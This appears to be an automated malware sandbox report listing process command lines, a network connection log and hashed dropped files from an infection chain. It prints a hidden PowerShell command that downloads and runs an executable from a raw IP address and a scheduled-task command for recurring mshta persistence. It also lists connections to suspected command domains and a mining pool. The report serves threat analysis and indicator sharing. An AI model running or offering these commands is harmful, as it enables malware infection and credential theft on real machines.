"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3592 /prefetch:2

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -childID 2 -isForBrowser -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a67518d-5779-43e7-8a1a-0724f092761d} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" tab

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn fD235maYYx8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2796 /prefetch:2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6Z8KTLLJMNBFJG8M1V4DCDHVI54AMKCK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2588 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dugong.ydns.eu udp
DE 38.180.229.217:80 dugong.ydns.eu tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com udp
GB 216.58.204.68:443 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 172.217.169.10:443 ogads-pa.googleapis.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 avx.medianewsonline.com udp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 142.250.180.14:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
GB 172.217.169.10:443 ogads-pa.googleapis.com tcp
US 172.67.189.66:443 moderzysics.top tcp
GB 172.217.169.10:443 ogads-pa.googleapis.com udp
US 172.67.189.66:443 moderzysics.top tcp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
DE 5.75.210.149:443 tcp
US 172.67.189.66:443 moderzysics.top tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 13.92.180.205:443 nw-umwatson.events.data.microsoft.com tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
N/A 127.0.0.1:9229 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
N/A 127.0.0.1:9229 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 pool.hashvault.pro udp
NL 149.154.167.99:443 t.me tcp
DE 80.240.16.67:443 pool.hashvault.pro tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.40.69.76:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
GB 172.217.169.10:443 ogads-pa.googleapis.com tcp
GB 172.217.169.10:443 ogads-pa.googleapis.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.32.1:443 exarthynature.run tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.80.1:443 croprojegies.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9229 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:52738 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:52765 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 142.250.187.206:443 youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 172.217.169.78:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp

Files

memory/1804-0-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-1-0x0000000077824000-0x0000000077826000-memory.dmp

memory/1804-2-0x0000000000941000-0x00000000009A1000-memory.dmp

memory/1804-3-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-4-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-5-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-6-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-7-0x0000000000940000-0x0000000000C5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe

MD5 11514677efdc49728bb951849b66217e
SHA1 f97f648487c3880e206a6f0aeaf8cbf65368992f
SHA256 309dcfe1a88c958d3f5bf4e41fd74e08df9acf9a34b54d45c01da8dc59eb55ff
SHA512 2dd09589d5484a0623ee03b3b0f4fb43e9025c6c58350b41839d77147f9aee59064d8ee64ded8dcad33c59ed551f240e12b0cd202d24c7467857576bff6a9516

memory/1316-13-0x0000000000910000-0x0000000000DC4000-memory.dmp

memory/1804-15-0x0000000000940000-0x0000000000C5C000-memory.dmp

memory/1804-11-0x0000000000941000-0x00000000009A1000-memory.dmp

memory/1316-16-0x0000000000910000-0x0000000000DC4000-memory.dmp

memory/1316-17-0x0000000000910000-0x0000000000DC4000-memory.dmp

memory/1316-18-0x0000000000910000-0x0000000000DC4000-memory.dmp

memory/1316-29-0x0000000000910000-0x0000000000DC4000-memory.dmp

memory/4732-31-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-32-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-33-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-34-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-35-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-36-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-37-0x0000000000740000-0x0000000000BF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

MD5 f0ad59c5e3eb8da5cbbf9c731371941c
SHA1 171030104a6c498d7d5b4fce15db04d1053b1c29
SHA256 cda1bd2378835d92b53fca1f433da176f25356474baddacdd3cf333189961a19
SHA512 24c1bf55be8c53122218631dd90bf32e1407abb4b853014f60bac1886d14565985e9dea2f0c3974e463bd52385e039c245fffb9f7527b207f090685b9bede488

memory/4732-50-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/1488-54-0x00000000004F0000-0x0000000000BEE000-memory.dmp

memory/4732-53-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-55-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-57-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-56-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/1488-59-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\??\pipe\crashpad_3124_ZSWSXBIBPFCZQSVV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir3124_73043662\0c488b6a-131d-4cb1-a421-13abb9a74ee5.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir3124_73043662\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

memory/6020-504-0x0000000000890000-0x0000000000F8E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 62dba11b4d324e502ae5acee1959c668
SHA1 6ceb4b73d4235621a0061a32fefe6fddabdeb5b5
SHA256 ec26b1a79b1b8ff0ba731cba07c550d670157c273400e186f5e0c3ad3a1f3200
SHA512 210444ee4a1fcbe162a0703e257405a0a37410ced62ffa6434334c7f2dbe00353b8d9ca762d65224c49d0152e6930a2b06105bf9bcb92731713be069e2fcc048

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f09c5037ff47e75546f2997642cac037
SHA1 63d599921be61b598ef4605a837bb8422222bef2
SHA256 ba61197fff5ed487084790b869045ab41830bdf6db815503e8e064dd4e4df662
SHA512 280bff6eac4b2b4fe515696223f61531f6b507c4c863ad9eef5ab0b1d65d264eba74fb7c9314b6920922142b8ab7605792211fca11a9a9ef0fc2ae995bf4f473

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a8e00d01-2d20-46d1-a0ec-0f8ceac0dcd6.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 010f6dd77f14afcb78185650052a120d
SHA1 76139f0141fa930b6460f3ca6f00671b4627dc98
SHA256 80321891fd7f7c02dd4be4e5be09f8e57d49e076c750f8deb300be8f600de2d7
SHA512 6e6c9e348e948b946cfb97478698423e1272c4417bc8540e5daa64858e28be8fda5baf28538aee849f8bb409c17a51c60e48a3f1793e3a86cb27edeb32aa30a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 52c9b3db696ec25943eabfee76bf6595
SHA1 de3d5be28d8ef1cc4a4710cdd19710059cd00164
SHA256 539464f32c3c142b758a09e542e6cfe8daee56b9ef29e9a0b5a90db4da8e7931
SHA512 43daf42ec543576d21527db1ea2145c13405ed7819c0f7fe14032c92d3369f2255442ce8e6ec1aab34d6691fcab068e7622ebc6f8241c53a44be8d2e3b62e5de

memory/1488-543-0x00000000004F0000-0x0000000000BEE000-memory.dmp

memory/1488-542-0x00000000004F0000-0x0000000000BEE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe

MD5 35ed5fa7bd91bb892c13551512cf2062
SHA1 20a1fa4d9de4fe1a5ad6f7cdd63c1f2dee34d12c
SHA256 1e6929de62071a495e46a9d1afcdf6ec1486867a220457aacfdfa5a6b6ff5df4
SHA512 6b8acda217f82bd4b2519bc089f05cfbdff654b2556db378cf8344972de33d63c11f4713b2b342b3cb6e333c59517448995c33d739f72fdf00e8a81d46bd8483

memory/4732-563-0x0000000000740000-0x0000000000BF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\F9B2.tmp\F9B3.tmp\F9B4.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/544-590-0x0000029D58C50000-0x0000029D58C72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kwhxjyhr.xqo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6020-606-0x0000000000890000-0x0000000000F8E000-memory.dmp

memory/6020-607-0x0000000000890000-0x0000000000F8E000-memory.dmp

memory/1488-614-0x00000000004F0000-0x0000000000BEE000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/1488-637-0x00000000004F0000-0x0000000000BEE000-memory.dmp

memory/5788-640-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/4732-639-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/5788-642-0x0000000000740000-0x0000000000BF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/5188-657-0x00000000004D0000-0x000000000096B000-memory.dmp

memory/5188-659-0x00000000004D0000-0x000000000096B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 ca4b11b02bfb5fc8793517891b8b97a5
SHA1 b11fa1674ec78c9411c643de1fd7781a1b8894bf
SHA256 f6d815cf1e9d1d31b99cd34656ea29b649957cc984aa944d48e6a1a6f0eeb043
SHA512 c4ed69bbf2e06f3789d421eeca472f5e9380224b3e21fe2f43018f223a863952d043157237ae33ad8f0ec433b10a551fd7b4ca0bb50192286a68b27c9e86dcec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

memory/6020-676-0x0000000000890000-0x0000000000F8E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 ef48733031b712ca7027624fff3ab208
SHA1 da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256 c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512 ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 8baaebee147fa91dc9602700196d086c
SHA1 23afdb05501b5f593693b1ef7af4addebc82cbcc
SHA256 82c9987f84499a6ff598c4f0bf7c04459bf37bfb6f2ad2ed6557e5c09de126dc
SHA512 1f387c126afb9994bd214d0deb99fb4a4af491a14bdc042ca14022a187f2b028b13669cd2b6bb1279a4100f9a880db18d5e5d5272105c07b74aa1b6f61537f07

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

MD5 57b45d2972b0bee1758e861c3988d86a
SHA1 8087dd3ac585e07859e96efefa4494ba7fcbdef2
SHA256 9ea685c2834da698e4151beb560b5be44a6c574be05241077a591d0556119b9f
